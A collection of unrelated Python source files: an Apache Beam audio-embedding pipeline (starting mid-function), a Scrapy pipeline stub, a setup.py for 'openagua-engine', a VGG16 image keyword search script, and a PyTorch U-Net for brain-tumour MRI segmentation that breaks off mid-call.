raise ValueError(f'Files not found: {filename}')
if len(input_filenames_list) != len(output_filenames):
raise ValueError('Input/output filename lengths don\'t match: '
f'{input_filenames_list} vs {output_filenames}')
# Make sure output files don't already exist.
for output_filename in output_filenames:
if tf.io.gfile.glob(f'{output_filename}*'):
raise ValueError(f'Output file already exists: {output_filename}')
# Lengths of flag lists must be the same.
if len(embedding_names) != len(embedding_modules):
raise ValueError(
f'Lengths don\'t match: {embedding_names} vs {embedding_modules}')
if len(embedding_modules) != len(module_output_keys):
raise ValueError(
f'Lengths don\'t match: {embedding_modules} vs {module_output_keys}')
# Shortnames must be unique.
if len(set(embedding_names)) != len(embedding_names):
raise ValueError(f'Shortnames must be unique: {embedding_names}')
# Create output directory if it doesn't already exist.
for output_filename in output_filenames:
output_dir = output_filename.rsplit('/', 1)[0]
if not tf.io.gfile.exists(output_dir):
tf.io.gfile.makedirs(output_dir)
def _read_from_tfrecord(root, input_filenames,
suffix):
"""Reads from a Python list of TFRecord files."""
if not isinstance(input_filenames, list):
raise ValueError(f'Expected list: {type(input_filenames)}')
return (root
| f'MakeFilenames{suffix}' >> beam.Create(input_filenames)
| f'ReadTFRecords{suffix}' >> beam.io.tfrecordio.ReadAllFromTFRecord(
coder=beam.coders.ProtoCoder(tf.train.Example))
| f'AddKeys{suffix}' >> beam.Map(
lambda x: (str(random.getrandbits(128)), x)))
def _write_to_tfrecord(combined_tbl, output_filename,
suffix):
_ = (combined_tbl
| f'RemoveKey{suffix}' >> beam.Map(lambda k_v: k_v[1])
| f'Write{suffix}' >> beam.io.WriteToTFRecord(
output_filename, coder=beam.coders.ProtoCoder(tf.train.Example)))
# Possible input formats. If you want to read from a different input format,
# add your read function here. Function should take (root, input_filenames) and
# map to input_examples.
reader_functions = {
'tfrecord': _read_from_tfrecord
}
# Write output to disk.
writer_functions = {
'tfrecord': _write_to_tfrecord,
}
def make_beam_pipeline(
root,
input_filenames,
sample_rate,
debug,
embedding_names,
embedding_modules,
module_output_keys,
audio_key,
sample_rate_key,
label_key,
speaker_id_key,
average_over_time,
delete_audio_from_output,
output_filename,
split_embeddings_into_separate_tables = False,
use_frontend_fn = False,
normalize_to_pm_one = True,
model_input_min_length = None,
input_format = 'tfrecord',
output_format = 'tfrecord',
suffix = 'Main',
module_call_fn = samples_to_embedding_tfhub,
setup_fn = hub.load):
"""Construct beam pipeline for mapping from audio to embeddings.
Args:
root: The beam root node.
input_filenames: Python list. List of input files.
sample_rate: Python int, or `None`. The sample rate for all embeddings, or
`None` if this is a TFDS dataset, or if each example has its own sample
rate.
debug: Python bool. Whether to operate in debug mode.
embedding_names: Python list of embeddings.
embedding_modules: Python list of TF-Hub modules.
module_output_keys: Python list of strings, names of output modules.
audio_key: Python string, the key of the audio.
sample_rate_key: Python string or `None`, the key for.
label_key: Python string. Field for label.
speaker_id_key: Python string or `None`. Key for speaker ID, or `None`.
average_over_time: Python bool. If `True`, average over the time axis.
delete_audio_from_output: Python bool. Whether to remove audio fromm
outputs.
output_filename: Python string. Output filename.
split_embeddings_into_separate_tables: Python bool. If true, write each
embedding to a separate table.
use_frontend_fn: If `true`, call frontend fn on audio before passing to the
model.
normalize_to_pm_one: Whether to normalize input to +- 1 before passing to
model.
model_input_min_length: Min length to the model, or `None`. 0-pad inputs to
this length, if necessary. Note that frontends usually contain their own
length logic, unless the model is in TFLite format.
input_format: Python string. Must correspond to a function in
`reader_functions`.
output_format: Python string. Must correspond to a function
`writer_functions`.
suffix: Python string. Suffix to stage names to make them unique.
module_call_fn: Function for inference on audio.
setup_fn: Function for creating audio inference model.
"""
tf_examples_key_ = 'tf_examples'
assert tf_examples_key_ not in embedding_names
s = suffix # for code brevity.
# Read from input.
input_examples = reader_functions[input_format](root, input_filenames, s)
# In debug mode, take one input example.
if debug:
input_examples = (
input_examples
| f'TakeOne{s}' >> beam.transforms.combiners.Sample.FixedSizeGlobally(1)
# Sampling generates lists, so flatten back into one collection.
| f'DebugFlatten{s}' >> beam.FlatMap(lambda x: x))
# Compute all the embeddings simultaneously.
embedding_tables = {}
for name, mod, out_key in zip(
embedding_names, embedding_modules, module_output_keys):
logging.info('Adding signal: %s %s, %s', name, mod, out_key)
tbl = input_examples | f'ComputeEmbedding-{name}-{s}' >> beam.ParDo(
ComputeEmbeddingMapFn(
name=name,
module=mod,
output_key=out_key,
audio_key=audio_key,
sample_rate_key=sample_rate_key,
sample_rate=sample_rate,
average_over_time=average_over_time,
feature_fn=_default_feature_fn if use_frontend_fn else None,
normalize_to_pm_one=normalize_to_pm_one,
model_input_min_length=model_input_min_length,
module_call_fn=module_call_fn,
setup_fn=setup_fn))
embedding_tables[name] = tbl
assert tf_examples_key_ not in embedding_tables
embedding_tables[tf_examples_key_] = input_examples
logging.info('embedding_tables: %s', embedding_tables)
# Either write to one table with all embeddings, or one table per embedding.
if split_embeddings_into_separate_tables:
output_table_dicts = [
(k, {k: v, tf_examples_key_: input_examples}) for
k, v in embedding_tables.items() if k != tf_examples_key_]
else:
output_table_dicts = [('all', embedding_tables)]
# Combine embeddings and tf.train.Example, using the common key.
writer_function = writer_functions[output_format]
for name, embedding_tables in output_table_dicts:
if split_embeddings_into_separate_tables:
cur_s = f'{name}-{s}'
# Add `name` as a subdir.
dirname, basename = os.path.split(output_filename)
cur_output_filename = os.path.join(dirname, name, f'{basename}@*')
else:
cur_s = s
cur_output_filename = f'{output_filename}@*'
combined_tbl = (
embedding_tables
| f'CombineEmbeddingTables-{cur_s}' >> beam.CoGroupByKey()
| f'AddEmbeddings-{cur_s}' >> beam.Map(
_add_embedding_column_map_fn,
original_example_key=tf_examples_key_,
delete_audio_from_output=delete_audio_from_output,
audio_key=audio_key,
label_key=label_key,
speaker_id_key=speaker_id_key))
logging.info('Writing to %s', cur_output_filename)
writer_function(combined_tbl, cur_output_filename, cur_s)
|
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
class ReelscoutPipeline(object):
def process_item(self, item, spider):
return item
|
import setuptools
VERSION = '0.2.15'
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setuptools.setup(
name="openagua-engine",
version=VERSION,
license="MIT",
author="David Rheinheimer",
author_email="david.rheinheimer@tec.mx",
description="Tools to connect a model engine to OpenAgua",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/openagua/openagua-engine",
packages=setuptools.find_packages(),
install_requires=["celery", "pubnub", "requests", "openagua_client", "loguru"],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires='>=3.6',
)
|
import sys
import argparse
import torch
import glob
import collections
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
from torchvision.models import vgg16
from torchvision import transforms
plt.rcParams["font.size"] = 16
images_db = collections.defaultdict(set)
def classify_image(img, topn = 4):
clf = vgg16(pretrained=True)
preprocess = transforms.Compose([
transforms.Resize(299),
transforms.CenterCrop(299),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]),])
with open('data/imagenet_classes.txt') as f:
classes = [line.strip() for line in f.readlines()]
img_t = preprocess(img)
batch_t = torch.unsqueeze(img_t, 0)
clf.eval()
output = clf(batch_t)
_, indices = torch.sort(output, descending=True)
probabilities = torch.nn.functional.softmax(output, dim=1)
d = {'Class': [classes[idx] for idx in indices[0][:topn]],
'Probability score': [np.round(probabilities[0, idx].item(),3) for idx in indices[0][:topn]]}
df = pd.DataFrame(d, columns = ['Class','Probability score'])
return df
def add_to_cache(image, df):
string_probability = set()
for i in range(len(df)):
class_names = df['Class'][i].split(',')
# probability = df['Probability Score'][i] # TODO: improve output sorting order
for name in class_names:
name = name.strip()
images_db[name].add(image)
for word in name.split(' '):
images_db[word.lower()].add(image)
def predict_images(dir, verbose):
# Predict labels with associated probabilities for unseen images
images = glob.glob(dir)
for image in images:
img = Image.open(image)
df = classify_image(img)
if verbose:
print(image)
print(df)
add_to_cache(image, df)
def _exit_program(event):
sys.exit()
def main():
parser = argparse.ArgumentParser(
prog='Image search',
description='''The program uses ML library to define the probability what
each image could be in the given directory. Then creating a map of keywords
to each image of the program at startup.
The program then takes user keyword and outputs images with those keywords ''',
epilog='''
The challenge was open ended and I figured with live DB,
having auth secrets in github wouldn't be a good idea;
and therefore went with a simple python solution.
Currently I am studing ML and AI so was interested in
trying to apply what I am learning for the challenge.''')
parser.add_argument('--keyword', '-k', action="store", type=str, nargs='?', required=True,
help='search keyword')
parser.add_argument('--directory', '-d', action="store", default="data/test_images/*.*",
help='valid directory of where the images are located')
parser.add_argument('--verbose', '-v', action="store_true",
help='to allow verbose output')
args = parser.parse_args()
print(args)
predict_images(args.directory, args.verbose)
search_keyword = args.keyword.strip().lower()
if search_keyword in images_db:
result_size = len(images_db[search_keyword])
fig = plt.figure(figsize=(result_size, result_size))
for ind, image in enumerate(images_db[search_keyword]):
img = Image.open(image)
img.load()
fig.add_subplot(result_size//2 +1, result_size//2 +1, ind+1)
plt.imshow(img)
mng = plt.get_current_fig_manager()
mng.full_screen_toggle()
axcut = plt.axes([0.4, 0.0, 0.2, 0.075])
bcut = plt.Button(axcut, 'Exit Search Results', color='grey', hovercolor='red')
bcut.on_clicked(_exit_program)
plt.show()
else:
print("0 results found for " + search_keyword + " try "
"searching something else.")
print("Keywords for image results: " )
print(list(images_db.keys()))
if __name__ == "__main__":
main()
|
import os
import cv2
import numpy as np
import numpy
import pandas as pd
import nibabel as nib
import torch.optim as optim
import random
import torch
from torch.nn import BCELoss, NLLLoss, BCEWithLogitsLoss, MSELoss, ModuleList, ReplicationPad2d
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable, Function
from torch.utils.data.sampler import SequentialSampler
from collections import OrderedDict
from torch.autograd import Variable
import itertools
from torch.utils.data.dataset import Dataset
from torch.utils.data import DataLoader
from torch.utils.data.sampler import Sampler, RandomSampler, WeightedRandomSampler
from torch._six import int_classes as _int_classes
data_shape = 192*192
target_label_sets = [[1],
[4],
[1,3,4],
[1,2,3,4],
[1,2,3,4,5]
]
target_label_names = ['necrosis', 'contrast_enhancing', 'core', 'tumor', 'brain']
label_prevalences = [0.1]*2+[0.2]+[0.4]+[0.9]
list(zip(label_prevalences,target_label_names))
np.random.seed(13375) # for reproducibility
random.seed(133567)
def rotateImage(image, angle, interp = cv2.INTER_NEAREST):
image_center = tuple(np.array(image.shape[1::-1]) / 2)
rot_mat = cv2.getRotationMatrix2D(image_center, angle, 1.0)
result = cv2.warpAffine(image, rot_mat, image.shape[1::-1], flags=interp)
return result
def get_stack(axis,
volume,
gt_volume,
central_slice,
first_slice=None,
last_slice=None,
stack_depth=5,
size = (192,192),
rotate_angle = None,
rotate_axis = 0,
flipLR = False,
lower_threshold = None,
upper_threshold= None):
if (first_slice is not None or last_slice is not None) and central_slice is not None:
raise ValueError('Stack location overspecified')
if (first_slice is not None and last_slice is not None) and stack_depth is not None:
raise ValueError('Stack location overspecified')
image_data = volume
if flipLR:
image_data = image_data[:,:,::-1]
if rotate_angle is not None:
image_data = np.swapaxes(rotateImage(np.swapaxes(image_data,0,rotate_axis),rotate_angle,cv2.INTER_LINEAR)
,0,rotate_axis)
#image_data = np.swapaxes(volume, 0, axis)
image_data = np.array(np.swapaxes(image_data, 0, axis), copy = True)
mean = np.mean(image_data[image_data>0])
sd = np.sqrt(np.var(image_data[image_data>0]))
if lower_threshold is None:
lower_threshold = 0
if upper_threshold is None:
upper_threshold = np.percentile(image_data[image_data>0], 99.9)
image_data[image_data<lower_threshold]=lower_threshold
image_data[image_data>upper_threshold]=upper_threshold
if first_slice is None:
if central_slice is not None:
first_slice = central_slice - stack_depth//2
last_slice = central_slice + stack_depth//2 + 1
elif last_slice is not None:
first_slice = last_slice - stack_depth
elif last_slice is None:
last_slice = min(first_slice + stack_depth, len(image_data))
pad_up = max(0, -first_slice)
pad_down = -min(0, len(image_data)-last_slice)
first_slice = max(first_slice,0)
last_slice = min(last_slice, len(image_data))
initial_stack = image_data[first_slice:last_slice]
initial_shape = initial_stack.shape[1:]
shape_difference = (size[0] - initial_shape[0],size[1] - initial_shape[1])
pad_size = ((pad_up,pad_down),
(shape_difference[0]//2, shape_difference[0] - shape_difference[0]//2),
(shape_difference[1]//2, shape_difference[1] - shape_difference[1]//2) )
initial_stack = np.pad(initial_stack, pad_size, mode = 'constant', constant_values = lower_threshold)
nonzero_mask = (initial_stack>lower_threshold).astype(np.int)
gt = gt_volume
if flipLR:
gt = gt[:,:,::-1]
if rotate_angle is not None:
gt = np.swapaxes(rotateImage(np.swapaxes(gt,0,rotate_axis),rotate_angle),0,rotate_axis)
gt = np.swapaxes(gt, 0, axis)
gt_stack = gt[first_slice:last_slice]
gt_stack = np.pad(gt_stack, pad_size, mode = 'constant', constant_values = 0)
return (initial_stack - mean)/sd, gt_stack, nonzero_mask
def get_stack_no_augment(axis, volume, gt_volume, first_slice, last_slice,size=(192,192)):
return get_stack(axis = axis,
volume = volume,
gt_volume = gt_volume,
central_slice=None,
stack_depth=None,
first_slice = first_slice,
last_slice = last_slice,
size=size)
# ## Define the U-net variant
class GradMultiplier(Function):
def __init__(self, lambd):
self.lambd = lambd
def forward(self, x):
return x.view_as(x)
def backward(self, grad_output):
return (grad_output * self.lambd)
def grad_multiply(x, lambd):
return GradMultiplier(lambd)(x)
def reduce_3d_depth (in_channel, out_channel, kernel_size, padding):
layer = nn.Sequential(OrderedDict([
("pad1", nn.ReplicationPad3d((1,1,1,1,0,0))),
("conv1", nn.Conv3d(in_channel, out_channel, kernel_size=kernel_size, padding=padding)),
("bn1", nn.BatchNorm2d(out_channel)),
("relu1", nn.ReLU())
]))
return layer
def down_layer(in_channel, out_channel, kernel_size, padding):
layer = nn.Sequential(OrderedDict([
("pad1", nn.ReplicationPad2d(1)),
("conv1", nn.Conv2d(in_channel, out_channel, kernel_size=kernel_size, padding=padding)),
("bn1", nn.BatchNorm2d(out_channel)),
("relu1", nn.ReLU()),
("pad2", nn.ReplicationPad2d(1)),
("conv2", nn.Conv2d(out_channel, out_channel, kernel_size=kernel_size, padding=padding)),
("bn2", nn.BatchNorm2d(out_channel)),
("relu1", nn.ReLU())]))
return layer
def up_layer(in_channel, out_channel, kernel_size, padding):
layer = nn.Sequential(OrderedDict([
("pad1", nn.ReplicationPad2d(1)),
("conv1", nn.Conv2d(in_channel, out_channel, kernel_size=kernel_size, padding=padding)),
("bn1", nn.BatchNorm2d(out_channel)),
("relu1", nn.ReLU()),
("pad2", nn.ReplicationPad2d(1)),
("conv2", nn.Conv2d(out_channel, out_channel, kernel_size=kernel_size, padding=padding)),
("bn2", nn.BatchNorm2d(out_channel)),
("relu2", nn.ReLU())]))
return layer
class DilatedDenseUnit(nn.Module):
def __init__(self, in_channel, growth_rate , kernel_size, dilation):
super(DilatedDenseUnit,self).__init__()
self.layer = nn.Sequential(OrderedDict([
("bn1", nn.BatchNorm2d(in_channel)),
("relu1", nn.ReLU()),
("pad1", nn.ReplicationPad2d(dilation)),
("conv1", nn.Conv2d(in_channel, growth_rate, kernel_size=kernel_size, dilation = dilation,padding=0))]))
def forward(self, x):
out = x
out = self.layer(out)
out = concatenate(x, out)
return out
def center_crop(layer, target_size):
_, _, layer_width, layer_height = layer.size()
start = (layer_width - target_size) // 2
crop = layer[:, :, start:(start + target_size), start:(start + target_size)]
return crop
def concatenate(link, layer):
crop = center_crop(link, layer.size()[2])
concat = torch.cat([crop, layer], 1)
return concat
def dense_atrous_bottleneck(in_channel, growth_rate = 12, depth = [4,4,4,4]):
layer_dict = OrderedDict()
for idx, growth_steps in enumerate(depth):
dilation_rate = 2**idx
for y in range(growth_steps):
layer_dict["dilated_{}_{}".format(dilation_rate,y)] = DilatedDenseUnit(in_channel,
growth_rate,
kernel_size=3,
dilation = dilation_rate)
in_channel = in_channel + growth_rate
return nn.Sequential(layer_dict), in_channel
class UNET_3D_to_2D(nn.Module):
def __init__(self, depth, channels_in = 1,
channels_2d_to_3d=32, channels=32, output_channels = 1, slices=5,
variance_gradient_multiplier = 1,
dilated_layers = [4,4,4,4],
growth_rate = 12):
super(UNET_3D_to_2D, self).__init__()
self.main_modules = []
self.depth = depth
self.slices = slices
self.variance_gradient_multiplier = variance_gradient_multiplier
self.depth_reducing_layers = ModuleList([reduce_3d_depth(in_channel, channels_2d_to_3d, kernel_size=3, padding=0)
for in_channel in [channels_in]+[channels_2d_to_3d]*(slices//2 - 1)])
self.down1 = down_layer(in_channel=channels_2d_to_3d, out_channel=channels, kernel_size=3, padding=0)
self.main_modules.append(self.down1)
self.max1 = nn.MaxPool2d(2)
self.down_layers = ModuleList([down_layer(in_channel = channels*(2**i),
out_channel = channels * (2**(i+1)),
kernel_size = 3,
padding=0
) for i in range(self.depth)])
self.main_modules.append(self.down_layers)
self.max_layers = ModuleList([nn.MaxPool2d(2) for i in range(self.depth)])
self.bottleneck, bottleneck_features = dense_atrous_bottleneck(channels*2**self.depth, growth_rate = growth_rate,
depth = dilated_layers)
self.main_modules.append(self.bottleneck)
self.upsampling_layers = ModuleList([nn.Sequential(OrderedDict([
("upsampling",nn.Upsample(scale_factor=2, mode = 'bilinear')),
("pad", nn.ReplicationPad2d(1)),
("conv", nn.Conv2d(in_channels= bottleneck_features,
out_channels=bottleneck_features,
kernel_size=3,
padding=0))])) for i in range(self.depth, -1, -1)])
self.main_modules.append(self.upsampling_layers)
self.up_layers = ModuleList([up_layer(in_channel= bottleneck_features+ channels*(2**(i)),
out_channel=bottleneck_features,
kernel_size=3,
padding=0) for i in range(self.depth, -1, -1)])
self.main_modules.append(self.up_layers)
self.last = nn.Conv2d(in_channels=bottleneck_features, out_channels=output_channels, kernel_size=1)
self.main_modules.append(self.last)
self.logvar = nn.Conv2d(in_channels=bottleneck_features, out_channels=output_channels, kernel_size=1)
def forward(self, x):
# down
out = x
for i in range(self.slices//2):
out = self.depth_reducing_layers[i](out)
out.transpose_(1, 2).contiguous()
size = out.size()
out = out.view((-1, size[2], size[3], size[4]))
links = []
out = self.down1(out)
links.append(out)
out = self.max1(out)
for i in range(self.depth):
out = self.down_layers[i](out)
links.append(out)
out = self.max_layers[i](out)
out = self.bottleneck(out)
links.reverse()
# up
for i in range(self.depth+1):
out = self.upsampling_layers[i](out)
out = concatenate(links[i], out)
out = self.up_layers[i](out)
pred = self.last(out)
logvar = self.logvar(out)
logvar = grad_multiply(logvar,self.variance_gradient_multiplier)
return pred, logvar
class Average(object):
def __init__(self):
self.reset()
def reset(self):
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.sum += val
self.count += n
@property
def avg(self):
return self.sum / self.count
def torch_dice(x, y):
epsilon = 1e-4
intersection = torch.mul(x,y)
intersection_sum = intersection.sum(1).sum(1)+epsilon/2
sum_true = x.sum(1).sum(1) + epsilon
sum_pred = y.sum(1).sum(1)
return 2*intersection_sum/(sum_pred+sum_true)
def torch_dice_local(x, y, radius):
epsilon = 1e-4
intersection = torch.mul(x,y)
local_mean = nn.Conv2d(1, 1, kernel_size=radius, padding=radius//2, bias=False)
local_mean.weight = torch.nn.Parameter(torch.ones(1,1,3,3).cuda()/(radius*radius))
local_intersection = local_mean(intersection.unsqueeze(1)) + epsilon
local_true = local_mean(x.unsqueeze(1)) + epsilon
local_pred = local_mean(y.unsqueeze(1))
return 2*local_intersection/(local_pred+local_true)
num_epochs = 3
class BCE_from_logits(nn.modules.Module):
def __init__(self):
super(BCE_from_logits,self).__init__()
def forward(self, input, target):
#input = input.clamp(min = -1, max = 1)
max_val = (-input).clamp(min=0)
loss = input - input * target + max_val + ((-max_val).exp() + (-input - max_val).exp()).log()
return loss
class BCE_from_logits_focal(nn.modules.Module):
def __init__(self, gamma):
super(BCE_from_logits_focal,self).__init__()
self.gamma = gamma
def forward(self, input, target):
#input = input.clamp(min = -1, max = 1)
max_val = (-input).clamp(min=0)
loss = input - input * target + max_val + ((-max_val).exp() + (-input - max_val).exp()).log()
p = input.sigmoid()
pt = (1-p)*(1-target) + p*target
return ((1-pt).pow(self.gamma))*loss
val_stack_size = 50
def heteroscedastic_loss(masks, outputs, logit_flip, nonzero_mask, gamma):
criterion = BCE_from_logits()
criterion2 = BCE_from_logits_focal(gamma)
flip_prob = F.sigmoid(logit_flip)
masks_flipped = (1- masks)*flip_prob + masks * (1 - flip_prob)
false_neg = ((-outputs).sign().clamp(min=0))*masks
false_pos = outputs.sign().clamp(min=0)*(1-masks)
label_is_flipped = false_neg+false_pos
flipped_gt = nonzero_mask*label_is_flipped
loss = criterion2(outputs, masks) + criterion2(outputs, masks_flipped) + criterion2(logit_flip, flipped_gt)
loss = loss*nonzero_mask
loss = loss.mean()
return loss
def apply_to_case(model, volumes, gt_volume, batch_size, variance_estimator = 'analytic', axis=0,
size=(256,256)):
model.eval()
volume_0, volume_1, volume_2, volume_3= volumes
print(volume_0.shape)
mask_total = []
logit_total = []
image_total = []
flip_total = []
loss_total = [0 for i in target_label_sets]
softmax_loss = 0
TP = np.zeros(len(target_label_sets))
FP = np.zeros(len(target_label_sets))
TN = np.zeros(len(target_label_sets))
FN = np.zeros(len(target_label_sets))
num_batches = volume_0.shape[axis]//(batch_size)
if volume_0.shape[axis]%batch_size > 0:
num_batches = num_batches + 1
class BrainDataTest(Dataset):
def __init__(self):
self.length = num_batches
# Override to give PyTorch access to any image on the dataset
def __getitem__(self, batch):
first_slice = batch*batch_size - 2
last_slice = np.min([(batch+1)*batch_size+2, volume_0.shape[axis]+2])
extra_upper_slices = np.max([0, 5 - (last_slice - first_slice)])
last_slice = last_slice + extra_upper_slices
images_t1, masks, nonzero_masks = get_stack_no_augment(axis = axis,
volume = volume_1,
gt_volume = gt_volume,
first_slice=first_slice,
last_slice=last_slice,
size=size)
images_t1ce, masks, nonzero_masks = get_stack_no_augment(axis = axis,
volume = volume_3,
gt_volume = gt_volume,
first_slice=first_slice,
last_slice=last_slice,
size=size)
images_t2, masks, nonzero_masks = get_stack_no_augment(axis = axis,
volume = volume_2,
gt_volume = gt_volume,
first_slice=first_slice,
last_slice=last_slice,
size=size)
images_flair, masks, nonzero_masks = get_stack_no_augment(axis = axis,
volume = volume_0,
gt_volume = gt_volume,
first_slice=first_slice,
last_slice=last_slice,
size=size)
images = np.stack([images_flair, images_t1, images_t2, images_t1ce])
masks = numpy.stack([numpy.isin(masks[2:-(2+extra_upper_slices)],labelset) for labelset in target_label_sets], axis =1)
masks = masks.astype(np.float)
bg = numpy.logical_not(numpy.isin(masks, [y for x in target_label_sets for y in x]))
nonzero_masks = nonzero_masks[2:-(2+extra_upper_slices)]
return images.astype(np.float32), masks.astype(np.float32), bg.astype(np.float32), nonzero_masks.astype(np.float32)
# Override to give PyTorch size of dataset
def __len__(self):
return self.length
test_generator = DataLoader(BrainDataTest(), sampler = SequentialSampler(BrainDataTest()),
num_workers=0,pin_memory=True)
for images, masks, bg, nonzero_masks in test_generator:
images = Variable(images, volatile=True).cuda()
masks = Variable(masks, volatile=True).cuda()[0]
bg = Variable(bg, volatile=True).cuda()[0]
nonzero_mask = Variable(nonzero_masks, volatile =True).cuda()
mask_total.append(masks.data.cpu().numpy())
image_total.append(images.data.cpu().numpy()[0,0,2:-2])
outputs, logit_flip = model(images)
outputs = outputs * torch.unsqueeze(nonzero_mask[0],1)
logit_flip = logit_flip * torch.unsqueeze(nonzero_mask[0],1)
flip_prob = F.sigmoid(logit_flip)
for idx, x in enumerate(target_label_sets):
if variance_estimator == 'analytic':
loss = heteroscedastic_loss(masks[0,idx],
outputs[:,idx],
logit_flip[:,idx],
nonzero_mask,
2).mean()
else:
loss = (BCE_from_logits_focal(2)(outputs[:,idx], masks[:,idx])*nonzero_mask).mean()
loss_total[idx] = loss_total[idx]+loss.data.cpu().numpy()[0]
mask_cpu = masks.data.cpu().numpy()
outputs_cpu = outputs.cpu().data.numpy()
TP_batch = np.sum(np.logical_and(outputs_cpu>0, mask_cpu>0), axis = (0,2,3))
FP_batch = np.sum(np.logical_and(outputs_cpu>0, mask_cpu<=0), axis = (0,2,3))
TN_batch = np.sum(np.logical_and(outputs_cpu<0, mask_cpu<=0), axis = (0,2,3))
FN_batch = np.sum(np.logical_and(outputs_cpu<0, mask_cpu>0), axis = (0,2,3))
TP = TP + TP_batch
FP = FP + FP_batch
TN = TN + TN_batch
FN = FN + FN_batch
background = torch.zeros_like(outputs[:,0:1])
softmax_outputs = F.log_softmax(torch.cat([background, outputs],dim=1), dim = 1)
softmax_masks = torch.cat([bg,masks], dim = 1)
_, softmax_masks = torch.max(softmax_masks, 1)
this_softmax_loss = (nn.NLLLoss2d(reduce=False)(softmax_outputs, softmax_masks)*nonzero_mask).mean()
softmax_loss = softmax_loss + this_softmax_loss.data.cpu().numpy()[0]
logit_total.append(outputs.cpu().data.numpy())
flip_total.append(logit_flip.cpu().data.numpy())
#loss_total = loss_total + loss.data.cpu().numpy()[0]
#dice_loss = 1 - torch.mean(torch_dice(outputs_prob.data, masks.data.float()))
#loss = loss + dice_weight*dice_loss
#dice_loss = torch.mean(torch_dice(outputs.data, masks.data.float()))
#local_dice_loss = torch.mean(torch_dice_local(outputs, masks.float(), 7))
#vloss = vloss +logvar.mean()/2 #+(1-local_dice_loss)
#loss = loss + 0.00001*(net.logvar.weight**2).sum()
#val_dice.update(dice_metric, images.size(0))
#val_loss.update(vloss.data[0], images.size(0))
full_image = np.concatenate(image_total)
full_mask = np.concatenate(mask_total)
full_logit = np.concatenate(logit_total)
full_flip = np.concatenate(flip_total)
loss_total = [x / num_batches for x in loss_total]
softmax_loss = softmax_loss/num_batches
print(full_mask.shape)
new_shape = full_image.shape
shape_difference = (full_image.shape[0] - np.swapaxes(volume_0,0, axis).shape[0],
full_image.shape[1]-np.swapaxes(volume_0,0, axis).shape[1],
full_image.shape[2]-np.swapaxes(volume_0,0, axis).shape[2])
print(shape_difference)
full_image = full_image[shape_difference[0]//2:new_shape[0]- (shape_difference[0] - shape_difference[0]//2),
shape_difference[1]//2: new_shape[1]- (shape_difference[1] - shape_difference[1]//2),
shape_difference[2]//2: new_shape[2]- (shape_difference[2] - shape_difference[2]//2)]
full_image = np.swapaxes(full_image, 0, axis)
full_mask = full_mask[:,shape_difference[0]//2:new_shape[0]- (shape_difference[0] - shape_difference[0]//2),
shape_difference[1]//2: new_shape[1]- (shape_difference[1] - shape_difference[1]//2),
shape_difference[2]//2: new_shape[2]- (shape_difference[2] - shape_difference[2]//2)]
full_mask = np.swapaxes(full_mask, 1, 0)
full_mask = np.swapaxes(full_mask, 1, axis+1)
full_logit = full_logit[:, shape_difference[0]//2:new_shape[0]- (shape_difference[0] - shape_difference[0]//2),
shape_difference[1]//2: new_shape[1]- (shape_difference[1] - shape_difference[1]//2),
shape_difference[2]//2: new_shape[2]- (shape_difference[2] - shape_difference[2]//2)]
full_logit = np.swapaxes(full_logit, 1, 0)
full_logit = np.swapaxes(full_logit, 1, axis+1)
full_flip = full_flip[:, shape_difference[0]//2:new_shape[0]- (shape_difference[0] - shape_difference[0]//2),
shape_difference[1]//2: new_shape[1]- (shape_difference[1] - shape_difference[1]//2),
shape_difference[2]//2: new_shape[2]- (shape_difference[2] - shape_difference[2]//2)]
full_flip = np.swapaxes(full_flip, 1, 0)
full_flip = np.swapaxes(full_flip, 1, axis+1)
return full_image, full_mask, full_logit, full_flip, loss_total, softmax_loss, TP, FP, TN, FN
def collect_bn_modules(module, bn_modules):
if isinstance(module, torch.nn.modules.batchnorm._BatchNorm):
bn_modules.append(module)
def fix_batchnorm(data_sample, swa_model):
"""
During training, batch norm layers keep track of a running mean and
variance of the previous layer's activations. Because the parameters
of the SWA model are computed as the average of other models' parameters,
the SWA model never sees the training data itself, and therefore has no
opportunity to compute the correct batch norm statistics. Before performing
inference with the SWA model, we perform a single pass over the training data
to calculate an accurate running mean and variance for each batch norm layer.
"""
bn_modules = []
swa_model.apply(lambda module: collect_bn_modules(module, bn_modules))
if not bn_modules: return
swa_model.train()
for module in bn_modules:
module.running_mean = torch.zeros_like(module.running_mean)
module.running_var = torch.ones_like(module.running_var)
momenta = [m.momentum for m in bn_modules]
inputs_seen = 0
bn_loader = make_sampler(data_sample, label_must_be_present=17, fraction=0.9, num_samples=1000)
for data in tqdm(bn_loader, leave=False):
images, masks, bg, nonzero_masks = data
images = Variable(images).cuda(async=True)
batch_size = images.size(0)
momentum = batch_size / (inputs_seen + batch_size)
for module in bn_modules:
module.momentum = momentum
res = swa_model(images)
inputs_seen += batch_size
for module, momentum in zip(bn_modules, momenta):
module.momentum = momentum
class BrainData(Dataset):
def __init__(self, datapoints,axes = [0,1,2] ):
self.axes = axes
self.length = len(t1_filepaths)
self.datapoints = datapoints
# Override to give PyTorch access to any image on the dataset
def __getitem__(self, index, stack_depth = 5, size = (192,192)):
index, image_idx, gt_id, random_flip, rotate_axis, rotate_angle, shift, scale = index
case, axis, random_slice = self.datapoints[index]
images_t1, gt, nonzero = get_stack(axis=axis, volume=t1_data[case][image_idx],
gt_volume = gt_data[case][gt_id], central_slice=random_slice, stack_depth=stack_depth, size = size,
rotate_angle = rotate_angle, rotate_axis = rotate_axis, flipLR = random_flip,
lower_threshold = 0, upper_threshold = t1_99_percent[case][image_idx]
)
images_t2, gt, nonzero = get_stack(axis=axis, volume=t2_data[case][image_idx],
gt_volume = gt_data[case][gt_id], central_slice=random_slice, stack_depth=stack_depth, size = size,
rotate_angle = rotate_angle, rotate_axis = rotate_axis, flipLR = random_flip,
lower_threshold = 0, upper_threshold = t2_99_percent[case][image_idx]
)
images_flair, gt, nonzero = get_stack(axis=axis, volume=flair_data[case][image_idx],
